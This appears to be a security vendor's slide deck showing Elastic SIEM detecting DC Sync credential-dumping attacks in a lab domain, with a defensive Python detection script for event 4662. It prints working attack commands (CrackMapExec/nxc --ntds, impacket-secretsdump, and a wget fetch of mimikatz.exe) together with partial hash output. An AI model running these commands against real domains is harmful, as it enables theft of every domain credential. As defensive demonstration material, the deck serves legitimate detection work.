CARBONHELIX
DC Sync Attack
CAUGHT BY ELASTIC AI SIEM
Presented by CarbonHelix
What is a DC Sync Attack?
A DC Sync attack lets an attacker impersonate a Domain Controller to request password hashes from Active Directory — without ever running code on the DC itself.

Using the Directory Replication Service (DRSUAPI) protocol, the attacker simply asks for credential replication, mimicking normal DC-to-DC traffic. The result? Complete credential theft that looks like business as usual.
Compromise Account → Get Replication Rights → Call DsGetNCChanges → Dump NTLM Hashes
Why Most EDRs Can't Stop This
DC Sync exploits legitimate AD functionality — not malware. Blocking the replication protocol would break your entire domain.
LIVING OFF THE LAND
No malicious files, no binaries — just standard RPC calls using tools like Mimikatz, Impacket, or CrackMapExec
AUTHORIZED TRAFFIC
The compromised account has legitimate replication rights — the requests appear fully authorized
BLOCKING = OUTAGES
Hard-blocking DRSUAPI would break DC replication, authentication, and backups across the enterprise
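Because the protocol itself cannot be blocked, the practical control is auditing: a replication request is only suspicious when the principal exercising the replication right is not a domain controller or a known sync service. The following is an added illustration of that logic (not Elastic's rule or CarbonHelix code); it assumes Windows Security event 4662 records with the SubjectUserName, AccessMask and Properties fields, and the sample events and the DC/sync-account allowlist are constructed.

```python
import re
from dataclasses import dataclass

# AD extended rights a principal must hold for DsGetNCChanges replication.
# These are the standard control-access-right GUIDs, not values from the slides.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
CONTROL_ACCESS = 0x100  # AccessMask bit that event 4662 sets for extended rights
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


@dataclass
class Event4662:
    subject_user: str   # SubjectUserName: who made the request
    access_mask: int    # AccessMask
    properties: str     # Properties: GUIDs of the rights exercised, in braces


def is_dcsync_candidate(ev: Event4662, allowlist: set[str]) -> bool:
    """True when a principal outside the allowlist exercised a replication right."""
    if not ev.access_mask & CONTROL_ACCESS:
        return False
    if not REPLICATION_RIGHTS & set(GUID_RE.findall(ev.properties.lower())):
        return False
    # Domain controller computer accounts and known directory-sync service
    # accounts replicate legitimately; anything else pulling changes is flagged.
    return ev.subject_user.upper() not in allowlist


def detect_dcsync(events: list[Event4662], allowlist: set[str]) -> list[str]:
    """Return the distinct principals whose events look like DC Sync."""
    return sorted({ev.subject_user for ev in events if is_dcsync_candidate(ev, allowlist)})


# Constructed sample data modelled on the slide scenario (hypothetical names).
DC_ALLOWLIST = {"DC01$", "DC02$", "SVC_DIRSYNC"}
SAMPLE_EVENTS = [
    Event4662("DC01$", 0x100, "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),         # normal DC-to-DC replication
    Event4662("kevin.mitnick", 0x100, "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"), # user account pulling all changes
    Event4662("kevin.mitnick", 0x10, "{11111111-2222-3333-4444-555555555555}"),  # unrelated access, made-up GUID
    Event4662("SVC_DIRSYNC", 0x100, "{89e95b76-444d-4c62-991a-0facbeda640c}"),   # allow-listed sync service
]

if __name__ == "__main__":
    print("DC Sync candidates:", detect_dcsync(SAMPLE_EVENTS, DC_ALLOWLIST))
```

Keep the allowlist explicit: matching every account name ending in "$" would also exempt a compromised workstation account, which is exactly the kind of principal that should be flagged.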
Attack #1: CrackMapExec (Remote DC Sync)
The scariest attack — uses SMB for remote replication. Completely bypasses endpoint-level EDR.
kali@attacker
$ nxc smb 10.190.32.10 -u 'kevin.mitnick' --ntds
[*] Windows Server 2019 Build 17763 (domain:hackproof.local)
[+] hackproof.local\kevin.mitnick (Pwn3d!)
[*] Dumping the NTDS, this could take a while...
Administrator:500:aad3b435b51404eeaad3...
hackproof.local\juan:e19ccf75ee54e06b06a5...
hackproof.local\chen:b4b9b02e6f09a9bd760f...
[*] All domain hashes dumped successfully
Medium ⚠ Potential Credential Access via DC Sync
Risk Score: 47 User: kevin.mitnick Host: dc02 MITRE: T1003.006
Attack #2: Impacket SecretsDump (Remote)
Same goal, different tool. SecretsDump also dumps credentials from the SAM hive — and Elastic catches both techniques.
kali@attacker
$ impacket-secretsdump hackproof.local/kevin.mitnick@10.190.32.10
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping LSA Secrets
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404ee...
hackproof.local\kevin.mitnick:1103:aad3b435...
High ⚠ Potential Remote Credential Access via Registry
Risk Score: 73 User: kevin.mitnick Host: dc02 MITRE: T1003.002 / T1021
Attack #3: Mimikatz — Blocked Instantly
Mimikatz couldn't even run. Elastic quarantined the binary immediately upon download — the file simply disappeared.
PowerShell - dc02
PS> wget http://10.190.32.12:9090/mimikatz.exe -OutFile mimikatz.exe
PS> ls
(empty — file quarantined by Elastic)
High 🛡 Malware Prevention Alert — QUARANTINED
Risk Score: 73 Rule: Windows.Hacktool.Mimikatz File: mimikatz.exe Action: quarantined
Elastic Caught Every Attack
CrackMapExec
Remote DC Sync via SMB/DRSUAPI
DETECTED
SecretsDump.py
Remote DC Sync + SAM Hive dump
DETECTED
Mimikatz
Local DC Sync attempt
BLOCKED
Even attacks that bypass traditional EDRs are caught by Elastic's AI-driven behavioral analysis.
Elastic Attack Discovery
Elastic doesn't just alert — it tells the full story of the attack using AI-powered Attack Discovery.
ATTACK CHAIN CORRELATION
Groups related alerts into coherent attack chains — showing the full sequence of events
MITRE ATT&CK MAPPING
Automatically maps activity to MITRE tactics and techniques for standardized classification
AI-POWERED TRIAGE
Prioritizes real threats, filters noise, and automates investigation — so your analysts focus on what matters
FULL NARRATIVE
Tells who, what, when, where — identifying users, hosts, and the complete attack timeline
MITRE ATT&CK — Attack Chain Mapped
Elastic mapped the full attack to the MITRE ATT&CK framework, highlighting Privilege Escalation, Credential Access, and Lateral Movement.
Reconnaissance
Resource Dev
Initial Access
Execution
Persistence
Priv Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command & Control
Discovery Credential Dump and Privilege Escalation
Host: dc02 Users: kevin.mitnick Alerts: 2 Status: Open
Your SOC Has You Covered
3 Attack Tools Tested
3 Attacks Detected
0 Attacks Missed
CarbonHelix + Elastic AI SIEM
Protecting what matters. Even from the attacks that hide in plain sight.